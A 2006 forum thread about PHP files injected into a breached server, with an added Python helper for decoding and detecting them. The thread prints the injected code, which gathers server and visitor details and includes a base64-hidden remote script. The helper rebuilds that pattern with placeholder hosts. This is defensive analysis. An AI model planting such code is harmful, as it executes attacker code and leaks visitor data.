
A Q about someone's code injection..

Posted: Wed Jan 11, 2006 3:00 am
by Jenk
Recently a server that I did some work on was breached and two PHP files were added to a directory.

The contents of these files were different, but both completed the same task: they gathered various $_SERVER info and then included from a Russian URL with the info in the GET vars.

Anyway - the one thing that struck me was the script kiddie's use of base64_encode() to 'mask' the URL?!

The last bit puzzled me somewhat.. was this a weak attempt at obfuscation, or is there some other reason (perhaps fooling include/require/PHP into thinking it is not actually including over HTTP - not likely, I would have thought)?

Posted: Wed Jan 11, 2006 5:19 am
by Buddha443556
Maybe the URL has become the signature for the exploit and the base64 encoding is just an attempt to hide that signature? That's reaching pretty far, though. Probably just trying to hide the URL from your average Fantastico user who has zero programming experience.

Posted: Wed Jan 11, 2006 6:19 am
by Maugrim_The_Reaper
What does base64_decode() say? It's likely just an obscuration measure - base64 isn't all that hard to decode. It also makes it easier to pass some data without being affected by URL encodings.

Posted: Wed Jan 11, 2006 7:08 am
by Jenk
It's the URL to a ruski site along with the info collected from $_SERVER. This is what was injected into one of the files; nothing malicious here, but obviously we don't know what is in the includes:

Code:

<? error_reporting(0);   // suppress any warnings from the failed/remote includes
$s="e";                  // trailing marker appended to the beacon string

// Collect request details: prefer $_SERVER, fall back to the register_globals-era
// globals of the same name so the script also works on old PHP 4 hosts.
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);

// Each value is base64-encoded and the pieces joined with "." ("." is not in the
// base64 alphabet, so the receiving side can split on it unambiguously).
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".
     base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s";

// Fetch and execute a remote script, sending the beacon as the query string. The URL is
// stored as two base64 halves; if the first include fails (returns false) a second URL is tried.
if ((include(base64_decode(/* removed */).base64_decode(/* removed */)."/?".$str))){}
else {include(base64_decode(/* removed */).base64_decode(/* removed */)."/?".$str);} ?>
Where /* removed */ was the URL broken into two and base64 encoded. (The if challenge has two different URLs.)
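An added triage helper (written for this page in Python; it is not code from the thread or from the injected file) covering the two things discussed above: decoding the "."-separated base64 beacon the script builds from $_SERVER, and scanning PHP source for include/require calls whose target is hidden in base64_decode() literals, reassembling the split halves the way PHP would at runtime. The real URL was removed from the post, so the sample PHP uses placeholder .invalid hosts, and the $_SERVER values are likewise constructed. Note that the encoding changes nothing about what include() does: it receives the same "http://..." string after base64_decode(), so the trick only defeats grep and naive signature matching; whether a remote include runs at all is governed by allow_url_fopen (and, from PHP 5.2, allow_url_include).

```python
import base64
import re
from urllib.parse import urlsplit

# Field order the injected script uses ($a .. $h).
FIELDS = ["HTTP_HOST", "SERVER_NAME", "REQUEST_URI", "PHP_SELF",
          "QUERY_STRING", "HTTP_REFERER", "HTTP_USER_AGENT", "REMOTE_ADDR"]

# Constructed stand-in for a victim's $_SERVER (not a real host).
SAMPLE_SERVER = {
    "HTTP_HOST": "www.example.invalid",
    "SERVER_NAME": "www.example.invalid",
    "REQUEST_URI": "/index.php?page=home",
    "PHP_SELF": "/index.php",
    "QUERY_STRING": "page=home",
    "HTTP_REFERER": "",                      # empty field -> two adjacent dots in the beacon
    "HTTP_USER_AGENT": "Mozilla/5.0 (constructed)",
    "REMOTE_ADDR": "192.0.2.10",
}


def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


def build_beacon(server: dict) -> str:
    """Reproduce the $str the injected PHP builds: base64 of each field, joined by '.', plus '.e'."""
    return ".".join(_b64(server.get(f, "")) for f in FIELDS) + ".e"


def decode_beacon(query: str) -> dict:
    """Recover the $_SERVER values from a captured beacon query string.
    '.' is not in the base64 alphabet, so splitting on it is unambiguous; '+' is, and
    query-string parsing turns it into a space, so restore it before decoding."""
    parts = query.replace(" ", "+").split(".")
    if parts and parts[-1] == "e":           # trailing "$s" marker
        parts = parts[:-1]
    return {name: base64.b64decode(part).decode("utf-8", "replace")
            for name, part in zip(FIELDS, parts)}


INCLUDE_CALL = re.compile(r'\b(?:include|require)(?:_once)?\s*\(')
B64_LITERAL = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]*)["\']\s*\)')


def _argument_span(src: str, start: int) -> str:
    """Text of the call argument starting just after the opening paren, up to its matching ')'."""
    depth, i = 1, start
    while i < len(src) and depth:
        if src[i] == "(":
            depth += 1
        elif src[i] == ")":
            depth -= 1
        i += 1
    return src[start:i - 1]


def find_obfuscated_includes(php_source: str) -> list:
    """For every include/require whose argument carries base64_decode() string literals,
    decode the literals in order and concatenate them: that is the prefix PHP would include."""
    hits = []
    for m in INCLUDE_CALL.finditer(php_source):
        literals = B64_LITERAL.findall(_argument_span(php_source, m.end()))
        if not literals:
            continue
        decoded = "".join(
            base64.b64decode(lit + "=" * (-len(lit) % 4)).decode("utf-8", "replace")
            for lit in literals)                 # PHP's decoder tolerates missing padding
        hits.append(decoded)
    return hits


def is_remote_target(prefix: str) -> bool:
    """True if the reconstructed include prefix is a stream wrapper PHP would fetch, not a local path."""
    return urlsplit(prefix).scheme.lower() in {"http", "https", "ftp", "ftps", "php", "data"}


# Constructed stand-in for the injected file (the thread's real URL was removed from the post);
# each URL is split into two base64 halves, and the else branch tries a second URL.
SAMPLE_PHP = (
    '<? error_reporting(0);$s="e";'
    '$str=base64_encode($_SERVER["HTTP_HOST"]).".$s";'
    'if ((include(base64_decode("{p1}").base64_decode("{p2}")."/?".$str))){{}} '
    'else {{include(base64_decode("{f1}").base64_decode("{f2}")."/?".$str);}} ?>'
).format(p1=_b64("http://prim"), p2=_b64("ary.invalid"),
         f1=_b64("http://fall"), f2=_b64("back.invalid"))


if __name__ == "__main__":
    for target in find_obfuscated_includes(SAMPLE_PHP):
        print("include target:", target, "(remote)" if is_remote_target(target) else "(local)")
    print(decode_beacon(build_beacon(SAMPLE_SERVER)))
```

Run against a real recovered file, find_obfuscated_includes() gives the grep-proof URL directly, and a captured request to that host can be fed to decode_beacon() to see exactly which hostname, path, referer and client address were reported.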